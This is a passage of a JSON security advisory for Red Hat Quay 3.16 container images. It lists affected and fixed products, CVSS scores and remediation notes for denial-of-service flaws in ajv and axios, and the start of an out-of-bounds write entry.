"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:fdcdd27be37044e0ab7b599ccc825b4ab3b3a77cb82d5436462098602a6b5a8d_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:7cb7b3d876d95c43ff147d72a46a832119050f7a337e0c0e83bd35ef82df0588_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:4ed1d4a7fe3bf6e4bb19551ae6e9349a50e5b3e7e003c8624fbfa9179d6a9dad_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:96331c01153e9fe30375a824093c827be40f5ed757341845b1becc31aba21361_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:b5a1f05b332a19479f08a5493c47c088602e06983abf894c4bf86c51d0ba392f_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:5937639bb3bc4fd76c1dfa9d1550f8ab955a5d12b44794c076d127a5ba4d68a4_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:701d55bb5aa5d095dc759a4e07d2c7e647c401bb13e4dd868afec2ee66f51406_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:8298307eb70190d303ad03a1b44a183df1e0fb5aa8f146e4abd028ea82d0aaf2_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:efe1b48667d21b1bc7c7d7b9c320be3e47f5679984079f1d4b976247e34ef087_arm64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:618838ba45069cb93c48acc40c19186a5e471d4ea17f8f057a5187e74d196a9b_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:6f505834f4023e94f791769bb6726d24e8e94605ee525d4f657b38ec2810e06f_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:bbd4e466a0973195c134bc7bd406a824a5e205201559931d2975fd337b435e7c_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:d5ad15db6f5f6271dbff37712024fb3aee765d29a88c58b65be8a174fdfffa04_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:22039703011a8853c57bad658c5d6d4b44543a8924d24b0c6e1eeb47a4092152_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:361f6631b82a6b550dcbd1ae3748229fd72e2b9ab5dfb537f326f680ded5700f_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:ce3149ec9752b6d48be532e33be903a30746237b27e5daa3d64358533981ddee_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:1d0b2c18a32a5e1195a65e2c6fe5c79f8acd1695a56e848302621a87e5ec041c_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:053e4754b5cae3086a44d302f5dc3254e4d7e312b154972774c5793d988846e8_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:cd0cec48f12c48bcaaeb5393be4a05d14d2bdad5d0c6071f3a1d4281fd43b58d_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:f5bd5ebf3c14a2320c7196c895df050b0dd605603f1a2fadff6901f3fdd44194_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:1ea5311ae56a211c4424a42d023745b962e8d322bb77097773d4621f0c0d5e91_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:2c1cb5de345c1ad4cb605d9b22ebbf1b0b0f8fbae51ebe04f63c522d4a27938e_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:9bc7b33061b26d6192081ce3fd9fcf2b7c3be9cd9b7901bbc0893d2db87017f2_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:fdcdd27be37044e0ab7b599ccc825b4ab3b3a77cb82d5436462098602a6b5a8d_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:7cb7b3d876d95c43ff147d72a46a832119050f7a337e0c0e83bd35ef82df0588_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:4ed1d4a7fe3bf6e4bb19551ae6e9349a50e5b3e7e003c8624fbfa9179d6a9dad_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:96331c01153e9fe30375a824093c827be40f5ed757341845b1becc31aba21361_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:b5a1f05b332a19479f08a5493c47c088602e06983abf894c4bf86c51d0ba392f_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:5937639bb3bc4fd76c1dfa9d1550f8ab955a5d12b44794c076d127a5ba4d68a4_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:701d55bb5aa5d095dc759a4e07d2c7e647c401bb13e4dd868afec2ee66f51406_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:8298307eb70190d303ad03a1b44a183df1e0fb5aa8f146e4abd028ea82d0aaf2_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:efe1b48667d21b1bc7c7d7b9c320be3e47f5679984079f1d4b976247e34ef087_arm64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "ajv: ReDoS via $data reference"
},
{
"cve": "CVE-2026-25639",
"cwe": {
"id": "CWE-1287",
"name": "Improper Validation of Specified Type of Input"
},
"discovery_date": "2026-02-09T21:00:49.280114+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:618838ba45069cb93c48acc40c19186a5e471d4ea17f8f057a5187e74d196a9b_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:6f505834f4023e94f791769bb6726d24e8e94605ee525d4f657b38ec2810e06f_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:bbd4e466a0973195c134bc7bd406a824a5e205201559931d2975fd337b435e7c_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:d5ad15db6f5f6271dbff37712024fb3aee765d29a88c58b65be8a174fdfffa04_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:22039703011a8853c57bad658c5d6d4b44543a8924d24b0c6e1eeb47a4092152_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:361f6631b82a6b550dcbd1ae3748229fd72e2b9ab5dfb537f326f680ded5700f_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:ce3149ec9752b6d48be532e33be903a30746237b27e5daa3d64358533981ddee_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:1d0b2c18a32a5e1195a65e2c6fe5c79f8acd1695a56e848302621a87e5ec041c_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:053e4754b5cae3086a44d302f5dc3254e4d7e312b154972774c5793d988846e8_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:cd0cec48f12c48bcaaeb5393be4a05d14d2bdad5d0c6071f3a1d4281fd43b58d_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:f5bd5ebf3c14a2320c7196c895df050b0dd605603f1a2fadff6901f3fdd44194_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:1ea5311ae56a211c4424a42d023745b962e8d322bb77097773d4621f0c0d5e91_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:2c1cb5de345c1ad4cb605d9b22ebbf1b0b0f8fbae51ebe04f63c522d4a27938e_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:9bc7b33061b26d6192081ce3fd9fcf2b7c3be9cd9b7901bbc0893d2db87017f2_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:fdcdd27be37044e0ab7b599ccc825b4ab3b3a77cb82d5436462098602a6b5a8d_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:7cb7b3d876d95c43ff147d72a46a832119050f7a337e0c0e83bd35ef82df0588_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:4ed1d4a7fe3bf6e4bb19551ae6e9349a50e5b3e7e003c8624fbfa9179d6a9dad_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:96331c01153e9fe30375a824093c827be40f5ed757341845b1becc31aba21361_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:b5a1f05b332a19479f08a5493c47c088602e06983abf894c4bf86c51d0ba392f_ppc64le"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2438237"
}
],
"notes": [
{
"category": "description",
"text": "A denial of service flaw has been discovered in the Axios npm package. the mergeConfig function in axios crashes with a TypeError when processing configuration objects containing __proto__ as an own property. An attacker can trigger this by providing a malicious configuration object created via JSON.parse(), causing complete denial of service.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "axios: Axios affected by Denial of Service via __proto__ Key in mergeConfig",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:5937639bb3bc4fd76c1dfa9d1550f8ab955a5d12b44794c076d127a5ba4d68a4_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:701d55bb5aa5d095dc759a4e07d2c7e647c401bb13e4dd868afec2ee66f51406_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:8298307eb70190d303ad03a1b44a183df1e0fb5aa8f146e4abd028ea82d0aaf2_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:efe1b48667d21b1bc7c7d7b9c320be3e47f5679984079f1d4b976247e34ef087_arm64"
],
"known_not_affected": [
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:618838ba45069cb93c48acc40c19186a5e471d4ea17f8f057a5187e74d196a9b_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:6f505834f4023e94f791769bb6726d24e8e94605ee525d4f657b38ec2810e06f_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:bbd4e466a0973195c134bc7bd406a824a5e205201559931d2975fd337b435e7c_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:d5ad15db6f5f6271dbff37712024fb3aee765d29a88c58b65be8a174fdfffa04_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:22039703011a8853c57bad658c5d6d4b44543a8924d24b0c6e1eeb47a4092152_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:361f6631b82a6b550dcbd1ae3748229fd72e2b9ab5dfb537f326f680ded5700f_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:ce3149ec9752b6d48be532e33be903a30746237b27e5daa3d64358533981ddee_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:1d0b2c18a32a5e1195a65e2c6fe5c79f8acd1695a56e848302621a87e5ec041c_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:053e4754b5cae3086a44d302f5dc3254e4d7e312b154972774c5793d988846e8_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:cd0cec48f12c48bcaaeb5393be4a05d14d2bdad5d0c6071f3a1d4281fd43b58d_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:f5bd5ebf3c14a2320c7196c895df050b0dd605603f1a2fadff6901f3fdd44194_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:1ea5311ae56a211c4424a42d023745b962e8d322bb77097773d4621f0c0d5e91_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:2c1cb5de345c1ad4cb605d9b22ebbf1b0b0f8fbae51ebe04f63c522d4a27938e_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:9bc7b33061b26d6192081ce3fd9fcf2b7c3be9cd9b7901bbc0893d2db87017f2_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:fdcdd27be37044e0ab7b599ccc825b4ab3b3a77cb82d5436462098602a6b5a8d_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:7cb7b3d876d95c43ff147d72a46a832119050f7a337e0c0e83bd35ef82df0588_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:4ed1d4a7fe3bf6e4bb19551ae6e9349a50e5b3e7e003c8624fbfa9179d6a9dad_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:96331c01153e9fe30375a824093c827be40f5ed757341845b1becc31aba21361_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:b5a1f05b332a19479f08a5493c47c088602e06983abf894c4bf86c51d0ba392f_ppc64le"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-25639"
},
{
"category": "external",
"summary": "RHBZ#2438237",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2438237"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-25639",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-25639"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-25639",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25639"
},
{
"category": "external",
"summary": "https://github.com/axios/axios/commit/28c721588c7a77e7503d0a434e016f852c597b57",
"url": "https://github.com/axios/axios/commit/28c721588c7a77e7503d0a434e016f852c597b57"
},
{
"category": "external",
"summary": "https://github.com/axios/axios/releases/tag/v1.13.5",
"url": "https://github.com/axios/axios/releases/tag/v1.13.5"
},
{
"category": "external",
"summary": "https://github.com/axios/axios/security/advisories/GHSA-43fc-jf86-j433",
"url": "https://github.com/axios/axios/security/advisories/GHSA-43fc-jf86-j433"
}
],
"release_date": "2026-02-09T20:11:22.374000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-04-03T15:21:25+00:00",
"details": "Before applying this update, make sure all previously released errata relevant\nto your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:5937639bb3bc4fd76c1dfa9d1550f8ab955a5d12b44794c076d127a5ba4d68a4_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:701d55bb5aa5d095dc759a4e07d2c7e647c401bb13e4dd868afec2ee66f51406_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:8298307eb70190d303ad03a1b44a183df1e0fb5aa8f146e4abd028ea82d0aaf2_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:efe1b48667d21b1bc7c7d7b9c320be3e47f5679984079f1d4b976247e34ef087_arm64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:6567"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:618838ba45069cb93c48acc40c19186a5e471d4ea17f8f057a5187e74d196a9b_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:6f505834f4023e94f791769bb6726d24e8e94605ee525d4f657b38ec2810e06f_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:bbd4e466a0973195c134bc7bd406a824a5e205201559931d2975fd337b435e7c_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:d5ad15db6f5f6271dbff37712024fb3aee765d29a88c58b65be8a174fdfffa04_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:22039703011a8853c57bad658c5d6d4b44543a8924d24b0c6e1eeb47a4092152_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:361f6631b82a6b550dcbd1ae3748229fd72e2b9ab5dfb537f326f680ded5700f_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:ce3149ec9752b6d48be532e33be903a30746237b27e5daa3d64358533981ddee_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:1d0b2c18a32a5e1195a65e2c6fe5c79f8acd1695a56e848302621a87e5ec041c_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:053e4754b5cae3086a44d302f5dc3254e4d7e312b154972774c5793d988846e8_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:cd0cec48f12c48bcaaeb5393be4a05d14d2bdad5d0c6071f3a1d4281fd43b58d_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:f5bd5ebf3c14a2320c7196c895df050b0dd605603f1a2fadff6901f3fdd44194_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:1ea5311ae56a211c4424a42d023745b962e8d322bb77097773d4621f0c0d5e91_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:2c1cb5de345c1ad4cb605d9b22ebbf1b0b0f8fbae51ebe04f63c522d4a27938e_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:9bc7b33061b26d6192081ce3fd9fcf2b7c3be9cd9b7901bbc0893d2db87017f2_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:fdcdd27be37044e0ab7b599ccc825b4ab3b3a77cb82d5436462098602a6b5a8d_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:7cb7b3d876d95c43ff147d72a46a832119050f7a337e0c0e83bd35ef82df0588_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:4ed1d4a7fe3bf6e4bb19551ae6e9349a50e5b3e7e003c8624fbfa9179d6a9dad_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:96331c01153e9fe30375a824093c827be40f5ed757341845b1becc31aba21361_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:b5a1f05b332a19479f08a5493c47c088602e06983abf894c4bf86c51d0ba392f_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:5937639bb3bc4fd76c1dfa9d1550f8ab955a5d12b44794c076d127a5ba4d68a4_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:701d55bb5aa5d095dc759a4e07d2c7e647c401bb13e4dd868afec2ee66f51406_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:8298307eb70190d303ad03a1b44a183df1e0fb5aa8f146e4abd028ea82d0aaf2_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:efe1b48667d21b1bc7c7d7b9c320be3e47f5679984079f1d4b976247e34ef087_arm64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:618838ba45069cb93c48acc40c19186a5e471d4ea17f8f057a5187e74d196a9b_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:6f505834f4023e94f791769bb6726d24e8e94605ee525d4f657b38ec2810e06f_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:bbd4e466a0973195c134bc7bd406a824a5e205201559931d2975fd337b435e7c_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:d5ad15db6f5f6271dbff37712024fb3aee765d29a88c58b65be8a174fdfffa04_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:22039703011a8853c57bad658c5d6d4b44543a8924d24b0c6e1eeb47a4092152_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:361f6631b82a6b550dcbd1ae3748229fd72e2b9ab5dfb537f326f680ded5700f_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:ce3149ec9752b6d48be532e33be903a30746237b27e5daa3d64358533981ddee_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:1d0b2c18a32a5e1195a65e2c6fe5c79f8acd1695a56e848302621a87e5ec041c_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:053e4754b5cae3086a44d302f5dc3254e4d7e312b154972774c5793d988846e8_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:cd0cec48f12c48bcaaeb5393be4a05d14d2bdad5d0c6071f3a1d4281fd43b58d_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:f5bd5ebf3c14a2320c7196c895df050b0dd605603f1a2fadff6901f3fdd44194_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:1ea5311ae56a211c4424a42d023745b962e8d322bb77097773d4621f0c0d5e91_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:2c1cb5de345c1ad4cb605d9b22ebbf1b0b0f8fbae51ebe04f63c522d4a27938e_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:9bc7b33061b26d6192081ce3fd9fcf2b7c3be9cd9b7901bbc0893d2db87017f2_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:fdcdd27be37044e0ab7b599ccc825b4ab3b3a77cb82d5436462098602a6b5a8d_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:7cb7b3d876d95c43ff147d72a46a832119050f7a337e0c0e83bd35ef82df0588_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:4ed1d4a7fe3bf6e4bb19551ae6e9349a50e5b3e7e003c8624fbfa9179d6a9dad_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:96331c01153e9fe30375a824093c827be40f5ed757341845b1becc31aba21361_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:b5a1f05b332a19479f08a5493c47c088602e06983abf894c4bf86c51d0ba392f_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:5937639bb3bc4fd76c1dfa9d1550f8ab955a5d12b44794c076d127a5ba4d68a4_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:701d55bb5aa5d095dc759a4e07d2c7e647c401bb13e4dd868afec2ee66f51406_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:8298307eb70190d303ad03a1b44a183df1e0fb5aa8f146e4abd028ea82d0aaf2_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:efe1b48667d21b1bc7c7d7b9c320be3e47f5679984079f1d4b976247e34ef087_arm64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "axios: Axios affected by Denial of Service via __proto__ Key in mergeConfig"
},
{
"cve": "CVE-2026-25990",
"cwe": {
"id": "CWE-787",
"name": "Out-of-bounds Write"
},
"discovery_date": "2026-02-11T21:05:39.535631+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:618838ba45069cb93c48acc40c19186a5e471d4ea17f8f057a5187e74d196a9b_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:6f505834f4023e94f791769bb6726d24e8e94605ee525d4f657b38ec2810e06f_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:bbd4e466a0973195c134bc7bd406a824a5e205201559931d2975fd337b435e7c_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:d5ad15db6f5f6271dbff37712024fb3aee765d29a88c58b65be8a174fdfffa04_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:22039703011a8853c57bad658c5d6d4b44543a8924d24b0c6e1eeb47a4092152_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:361f6631b82a6b550dcbd1ae3748229fd72e2b9ab5dfb537f326f680ded5700f_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:ce3149ec9752b6d48be532e33be903a30746237b27e5daa3d64358533981ddee_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:1d0b2c18a32a5e1195a65e2c6fe5c79f8acd1695a56e848302621a87e5ec041c_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:053e4754b5cae3086a44d302f5dc3254e4d7e312b154972774c5793d988846e8_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:cd0cec48f12c48bcaaeb5393be4a05d14d2bdad5d0c6071f3a1d4281fd43b58d_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:f5bd5ebf3c14a2320c7196c895df050b0dd605603f1a2fadff6901f3fdd44194_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:1ea5311ae56a211c4424a42d023745b962e8d322bb77097773d4621f0c0d5e91_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:2c1cb5de345c1ad4cb605d9b22ebbf1b0b0f8fbae51ebe04f63c522d4a27938e_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:9bc7b33061b26d6192081ce3fd9fcf2b7c3be9cd9b7901bbc0893d2db87017f2_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:fdcdd27be37044e0ab7b599ccc825b4ab3b3a77cb82d5436462098602a6b5a8d_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:7cb7b3d876d95c43ff147d72a46a832119050f7a337e0c0e83bd35ef82df0588_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:4ed1d4a7fe3bf6e4bb19551ae6e9349a50e5b3e7e003c8624fbfa9179d6a9dad_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:96331c01153e9fe30375a824093c827be40f5ed757341845b1becc31aba21361_s390x",
